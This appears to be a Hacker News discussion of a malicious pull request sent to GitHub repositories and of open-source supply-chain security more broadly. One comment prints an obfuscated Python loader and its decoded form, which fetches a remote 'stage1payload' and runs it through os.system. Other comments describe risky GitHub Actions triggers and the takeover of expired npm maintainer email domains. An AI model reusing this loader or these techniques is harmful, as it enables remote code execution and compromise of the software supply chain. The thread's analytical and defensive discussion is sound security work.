My GitHub repos are seeing upticks in strange PRs that may be attacks. But the article's PR doesn't seem innocent at all; it's more like a huge, dangerous red flag.
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create cross-repo, cross-organization flagging for risky PRs. For example, when a repo owner sees a questionable PR, they can currently report it to GitHub staff, but that takes quite a while; instead, what if a repo owner could flag a PR as questionable, which in turn would propagate cautionary flags to similar PRs or similar author activity?
GitHub needs to step up its security game in general. 2FA should be made mandatory. GitHub "Actions" are a catastrophe waiting to happen - very few people pin Actions to a specific commit; most use a tag of the Action, which can be moved at will. A malicious author could instantaneously compromise thousands of pipelines with a single commit. Also, PR diffs often hide entire files by default - why!?!
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
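To make the pinning point concrete, here is a minimal sketch of an audit script a maintainer could run over their own repo; the file layout, regexes, and output are assumptions, not any official GitHub tooling:

    # Minimal sketch: flag "uses:" references in workflow files that are not
    # pinned to a full 40-character commit SHA. Regexes and paths are guesses.
    import re
    from pathlib import Path

    USES_RE = re.compile(r"uses:\s*([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@([\w.-]+)")
    SHA_RE = re.compile(r"^[0-9a-f]{40}$")

    def audit(repo_root: str = ".") -> None:
        for wf in Path(repo_root, ".github", "workflows").glob("*.y*ml"):
            for lineno, line in enumerate(wf.read_text().splitlines(), start=1):
                m = USES_RE.search(line)
                if m and not SHA_RE.match(m.group(2)):
                    print(f"{wf}:{lineno}: {m.group(1)}@{m.group(2)} is a mutable ref, not a pinned SHA")

    if __name__ == "__main__":
        audit()

Even then, a pinned SHA only helps if someone actually reviewed that commit, and (as noted further down) it doesn't cover Docker-based actions whose image can be swapped behind the same label.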
The rampant "@V1" usage for GitHub Actions has always been so disturbing to me. Even better is the fact that GitHub does all of the work of showing you who is actually using the action! So just compromise the account and then start searching for workflows with authenticated web tokens to AWS or something similar.
It's probably already happening.
Not that long ago, Facebook was accidentally leaking information through their self-hosted runners, via a very common mistake people make. https://johnstawinski.com/2024/01/11/playing-with-fire-how-w...
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it; I had to help him escalate through a relevant security contact I had at Meta.
Exactly.
Doing this simply shouldn't be allowed. Nor should maintaining Actions without mandatory 2FA. All it takes is one compromised account to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
2FA matters very little when you have never-expiring tokens.
2FA also matters little if the attacker has compromised your machine. They can use your 2FA-authenticated session.
Only once… but if they can get your forever token… that's not the same.
Once is enough.
And thanks to the likes of Composer and similar tools, devs end up making non-expiring tokens to reduce annoyance. There needs to be a better system. Having to manually generate a token for tooling can be a drag.
GitHub specifically recommended that you have v1, v1.x, and v1.x.x tags.
When you go from v1.5.3 to v1.5.4, you make v1.5 and v1 point to v1.5.4.
The point is that any of those tags can be replaced maliciously, after the fact.
Sorry, I followed along up to this point - how can this be done?
If tags are the way people want to work, then there needs to be a new repo class for actions which explicitly removes the ability to delete or force push tags across all branches. And enforced 2FA.
Using a commit hash is the second most secure option. The first (in my eyes) is vendoring the actions you want to use in your user/org's namespace. Maintaining when/if to sync or backport upstream modifications can protect against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
Also the heuristic used to collapse file diffs makes it so that the most important change in a PR often can't be seen or ctrl-f'd without clicking first.
Blame it on Go dependency lists and the like.
What do you even review when it's one of those? There are thousands of lines changed, and they all point to commits on other repositories.
You're essentially hoping it's fine.
Shipping code to production without evidence that anyone credible has reviewed it is, at a minimum, negligence.
You're claiming here that you do a review of all of your dependencies?
I've always considered the wider point to be that viewing diffs inline is a laziness-inducing anti-pattern in development: if you never actually bring the code to your machine, you don't quite feel like it's "real." Even if it's not a full test, compiling and running it yourself should be something that happens; if that feels uncomfortable... then maybe there's a reason.
And even if you pin your actions, if they're Docker actions the author can replace the Docker container at that label:
https://github.com/rust-build/rust-build.action/blob/59be2ed...
2FA is already mandatory on GitHub.
Seems I missed that change, thanks.
It only happened in the last month or so I think.
Nah. A year maybe?
What's next, checking that Releases match the code on Github?
With what, a reproducible build? Madness! Madness I say!
Having a reproducible build does not prove that the tarball contains the same source as git.
SLSA aims to achieve this, though, right? Specifically going from level 2 to level 3.
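SLSA provenance aside, a crude local version of "does the release tarball match the tag" can be scripted. This is only a sketch; the tag name and tarball prefix are assumptions, and generated files (configure scripts and the like) will legitimately differ between the two, which is also roughly where the xz payload hid:

    # Rough sketch: compare the file contents of a release tarball against an
    # archive generated from the corresponding git tag. Prefix is a guess.
    import hashlib
    import io
    import subprocess
    import tarfile

    def tree_digest(tar, strip_prefix):
        """Map each regular file's path (prefix stripped) to its SHA-256."""
        digests = {}
        for member in tar.getmembers():
            if member.isfile():
                name = member.name.removeprefix(strip_prefix).lstrip("/")
                digests[name] = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
        return digests

    def compare(release_tarball, tag, repo_dir="."):
        git_tar_bytes = subprocess.run(
            ["git", "-C", repo_dir, "archive", "--format=tar", tag],
            check=True, capture_output=True).stdout
        with tarfile.open(release_tarball) as rel:
            release = tree_digest(rel, strip_prefix=f"project-{tag}")  # top-level dir name is a guess
        with tarfile.open(fileobj=io.BytesIO(git_tar_bytes)) as git_tar:
            from_git = tree_digest(git_tar, strip_prefix="")
        for path in sorted(set(release) | set(from_git)):
            if release.get(path) != from_git.get(path):
                print("MISMATCH or missing:", path)

Anything this flags isn't automatically malicious, but it is exactly the gap between "the git history looks clean" and "the artifact people actually download is clean."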
TL;DR: Why not add a capability/permissions model to CI?
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub Actions being seen as "trustworthy"
2. GitHub Actions lacking granular, default-deny permissions
3. Rising incentives to attempt developer-machine compromise, including via the $5 wrench[1]
4. The risk of identity information being stolen in a breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea; a rough sketch follows the list. Stop an action run when:
* an action attempts unexpected network access
* an action attempts IO on unexpected files or folders
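Nothing like this exists in GitHub Actions today; the following is purely a toy sketch of what a deny-by-default step policy could look like if a runner enforced it (all names and fields are invented):

    # Toy sketch of a deny-by-default capability policy a CI runner might
    # enforce per step. Not a real GitHub Actions feature; names are made up.
    from dataclasses import dataclass, field
    from fnmatch import fnmatch
    from urllib.parse import urlparse

    @dataclass
    class StepPolicy:
        allowed_hosts: set = field(default_factory=set)    # default: no network
        allowed_paths: list = field(default_factory=list)  # default: no file IO

        def check_network(self, url):
            host = urlparse(url).hostname or ""
            if host not in self.allowed_hosts:
                raise PermissionError(f"unexpected network access to {host!r}; failing the run")

        def check_file(self, path):
            if not any(fnmatch(path, pat) for pat in self.allowed_paths):
                raise PermissionError(f"unexpected file access to {path!r}; failing the run")

    # A test step that may only talk to github.com and touch the workspace:
    policy = StepPolicy(allowed_hosts={"github.com"}, allowed_paths=["/workspace/*"])
    policy.check_network("https://github.com/some/repo")   # allowed
    policy.check_file("/workspace/src/main.py")            # allowed
    # policy.check_network("https://www.evildojo.com/stage1payload")  # would raise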
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
[1]: https://xkcd.com/538/
[2]: https://learn.adacore.com/courses/intro-to-ada/chapters/cont...
[3]: https://learn.microsoft.com/en-us/dotnet/csharp/language-ref...
[4]: https://gren-lang.org/
[5]: https://arstechnica.com/ai/2024/06/windows-recall-demands-an...
When I saw the screenshot I almost laughed out loud at the thought that anyone would say this is innocent looking.
It looked like a PR stunt
Yeah, the guy is literally named evildojo.
And then a 666 to boot, I mean gosh. Bad news.
But GitHub gets a higher valuation from having X number of active users. The last thing they want is to make that number drop!
By the way, on GH you can also buy stars for your project from fake accounts.
> 2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
Just do a blue-checkmark thing by tying the account to a real-world identity (eIDAS etc.). It's not rocket science; there are a gazillion providers that offer this sort of ID check as a service, GH would just need to integrate it.
No, this is the exact opposite of what we want. The ability to maintain pseudonymity for maintainers and contributors is paramount for personal safety. We must be able to keep online and meatspace personas separate without compromising the security of software. Stay wary of Worldcoin as the supposed fix for this.
Ah yes I'm sure it's completely impossible to game these services by printing a fake id at home and showing it on the webcam /s
Step 1: Automatically reject PRs from usernames like "evildojo666"
Your username would suffer from this policy, as would anyone describing themselves as a hacker.
Why though
It's someone attempting to set up/frame someone else
https://x.com/vxunderground/status/1856450468945506615
https://x.com/evildojo666/status/1856413636748562827
That makes a lot more sense than the headline. It doesn't look like a serious attempt and is not well obfuscated.
triple false-flags to sow/reap FUD
How is that innocent looking? exec(''.join(chr(x) for x in [...])) stands out like a sore thumb.
The username is literally "evildojo666"
It's not, I think the headline is for clicks and engagement.
Looks like he accidentally added a file. It's not "innocent," but it's definitely disguised by appearing to be a README-only change
Even the PR is described as just a docs change
No injection here, purely functional programming
The code in question:
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,116,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101,118,105,108,100,111,106,111,46,99,111,109,47,115,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,46,100,101,99,111,100,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,41,10])
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www.evildojo.com/stage1payload")\ny = x.read()\nz = y.decode("utf8")\nx.close()\nos.system(z)\n'
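A payload like this should never survive even a cursory automated pass; a crude reviewer-side heuristic over the added lines of a diff would flag it. The patterns and thresholds below are just guesses, not a proven detector:

    # Crude heuristic: flag added diff lines containing long integer lists fed
    # to chr()/join, or exec/eval on a constructed string. Thresholds are guesses.
    import re

    SUSPICIOUS = [
        re.compile(r"(?:\b\d{2,3}\s*,\s*){20,}"),             # long run of byte-sized integers
        re.compile(r"\b(exec|eval)\s*\("),                     # dynamic execution
        re.compile(r"chr\s*\(\s*\w+\s*\)\s*for\s+\w+\s+in"),   # chr(x) for x in ...
    ]

    def flag_suspicious_lines(diff_text):
        hits = []
        for lineno, line in enumerate(diff_text.splitlines(), start=1):
            if line.startswith("+") and any(p.search(line) for p in SUSPICIOUS):
                hits.append((lineno, line.strip()))
        return hits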
You ever get offended that the attacker is so obviously incompetent? At least put in the work like the xz attacker.
> At least put in the work like the xz attacker.
There are very few people who can do that.
There are countless people who can do that and don't. There are almost certainly many people actively doing it still today. Thinking that the xz attack was extraordinary or difficult is a very big mistake.
Its news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discreetly malicious contributors," not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
I came to the realization over a year ago that the only thing needed to be an "advanced persistent threat" is an attention span. Not even a long one.
Judging by how many drive-bys a random IPv4 address gets on AWS, GCP, Azure, or Vultr - they get ignored if they get it wrong, and nobody notices until it's too late if they get it right.
Well, the other takeaway is that if somebody can put in the work to do that in the hope of getting included in a Linux distro, what are they doing to get included in macOS / Windows?
Well, Linux distributions can be installed on Windows, so…
They were targeting OpenSSH servers, not desktops.
I mean people often use desktops to connect to servers.
It's akin to putting an exploit into say some security software. It's probably going to have access to something you care about.
> There are very few people who can do that
You're right. What made the XZ attacker rather unique is the fact that they made useful contributions at first and only turned nasty later on.
Not many people can keep a malicious campaign going for as long as the XZ attacker did, which is why it's suspected to be a nation-backed attack.
Not unique. Bitcoins were stolen with a similar technique: hijacking a JS dependency of some Bitcoin wallet app. It was done by making proper contributions at first to gain control of the thing.
They were even better: the library behaved completely normally when used anywhere else.
xz was found because it behaved differently.
I mean, just look at https://milksad.info for what some argue is a very long-game supply chain attack: intentionally bad entropy in the tool recommended in Mastering Bitcoin.
There are many people who could pull off an attack like that if they were so inclined.
Most of the time you can just buy an expired domain name tied to a JS include or a dependency maintainer's email address, and you now have the arguably -legal- ability to publish any code you want to thousands of orgs.
Plenty of expired npm maintainer email domains right now. Have fun.
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
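The audit half of this is almost trivially scriptable. A crude sketch against the public npm registry follows; the package name is only a familiar example, and a domain that fails to resolve is a hint worth investigating, not proof it can be re-registered:

    # Crude sketch: list maintainer email domains for an npm package and check
    # whether they still resolve in DNS. Package name is just an example.
    import json
    import socket
    import urllib.request

    def maintainer_domains(package):
        with urllib.request.urlopen(f"https://registry.npmjs.org/{package}") as resp:
            meta = json.load(resp)
        return {m["email"].split("@")[-1].lower()
                for m in meta.get("maintainers", []) if "email" in m}

    def check_package(package):
        for domain in sorted(maintainer_domains(package)):
            try:
                socket.getaddrinfo(domain, None)
                status = "resolves"
            except socket.gaierror:
                status = "does NOT resolve - worth a closer look"
            print(f"{package}: {domain}: {status}")

    check_package("left-pad")  # familiar example, not an accusation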
You need ability, means (as in -- have the money to spend time on it), and motive. Many people have the ability. Many people have the means. (And there is some overlap, but the overlap isn't that large.) Few people have the motive.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Exactly, most of us need to work and aren't motivated enough to spend our free time committing crimes. I also assume this is full time work. From my limited perspective the hardest part was the time investment and gaining enough trust to put the code into action.
...and the ones who truly can, won't be noticed.
I like how it both indicates that it's evil and that it's a first-stage malicious payload. Very informative.
Did anyone download the payload before it 404'd?
I don't think it ever existed. According to the owner of the site anyway.
That seems pretty clumsy. Even a first-year employee would catch that in a code review.
Not sure how the OP describes that as innocent-looking.
obfuscated code, check
use of eval, check
How was that innocent looking?
Related. Others?
Threat actor attempted to slipstream a malware payload into yt-dlp's GitHub repo - https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5 comments)
The recently famous one is the XZ Utils takeover...
https://en.wikipedia.org/wiki/XZ_Utils_backdoor
It's so ham-handed that it reminds me of typical phishing emails, which are supposedly full of misspellings to filter out recipients who notice misspellings and aren't worth the trouble to try to scam.
Maybe it's the hacking equivalent of Schrödinger's douchebag? If the hacking attempt succeeds, then you've achieved your goal. If it fails, then you were obviously joking or doing "research."
Note that if you have a self-hosted runner and any environment variables or execution state are carried over between runs, you should not even reply to or comment on a malicious PR. The reason: if they have a pull_request_review_comment workflow inside the fork...
well, guess what? It bypasses even the "Require approval for all outside collaborators" flag in your repo settings and triggers it on your self-hosted runner anyway...
This was brought up in recent BlackHat24:
https://github.com/AdnaneKhan/ConferenceTalks/blob/main/Blac...
And yes - it's another "Github won't fix"
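One partial mitigation for maintainers with self-hosted runners is to glance at a fork's workflow files before touching its PR at all. A rough sketch using the public REST API; the trigger list and repo name are placeholders, and unauthenticated calls are rate-limited:

    # Rough sketch: list a fork's workflow files and flag triggers of the kind
    # discussed above. The trigger list is a guess, not an exhaustive set.
    import base64
    import json
    import urllib.error
    import urllib.request

    RISKY_TRIGGERS = ("pull_request_target", "pull_request_review_comment", "issue_comment")
    API = "https://api.github.com"

    def _get(url):
        with urllib.request.urlopen(url) as resp:
            return json.load(resp)

    def risky_workflows(fork):
        try:
            listing = _get(f"{API}/repos/{fork}/contents/.github/workflows")
        except urllib.error.HTTPError:
            print(f"{fork}: no workflows directory (or repo not found)")
            return
        for entry in listing:
            blob = _get(entry["url"])
            text = base64.b64decode(blob["content"]).decode("utf-8", "replace")
            hits = [t for t in RISKY_TRIGGERS if t in text]
            if hits:
                print(f"{fork}/{entry['path']}: contains {', '.join(hits)}")

    risky_workflows("someuser/some-fork")  # placeholder repo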
It’s not even subtle. How crude. I guess even the state govs are outsourcing their work to script kiddies
lol this is a troll by someone who hates someone else and is setting them up.
Zero nation-states are involved in this.
Did I miss the evidence that this is state-backed?
This account was spamming Python repositories with the same type of low-value, obvious backdoor spam.[1]
Full list of attempted pull requests (all seemingly deleted by GitHub):
[1] https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...
University of Minnesota at it again?
For those who don't get the reference, there was an incident where security research by University of Minnesota students/professors was conducted without communicating or receiving permission from anyone on the Linux side or from the Institutional Review Board (IRB).
It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
https://cse.umn.edu/cs/linux-incident
https://www.theverge.com/2021/4/30/22410164/linux-kernel-uni...
Yes, really looks like someone conducting a study, or someone who wants to call out projects for their sloppy PR reviews.
I think it looks like someone just ham-fisting a known vulnerability, trying to find one sucker who doesn't know what he's doing. If you're a junior with a learning project, maybe you'd approve the merge.
I moved to Codeberg and there's nothing of the sort going on there. Quite relaxing.
On GitHub I did get weird and suspicious contributions.
Can't help but wonder... did anyone bite?
Review all code you ship to production or get burned. Every single dependency.
Security is expensive. Pay for it now or pay more later.
Et tu evildojo666?
Title is misleading; it's an exec that's not hidden in any way.
Another vulnerability of the GitHub monoculture. Attackers wanting to automate attempts to subvert open-source projects only have to focus on one system.
The hardcover edition of Jurassic Park explained, including screenshots of his IDE, how Dennis Nedry managed to shut off the park security: by disguising a call to the "turn off the fences" code as an innocuous object constructor.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
banned
https://github.com/evildojo666
will next account be 667?
Anyone who does not review patches before accepting them deserves to suffer the consequences of their laziness.
And what do the people who are actively trying to sabotage repos deserve?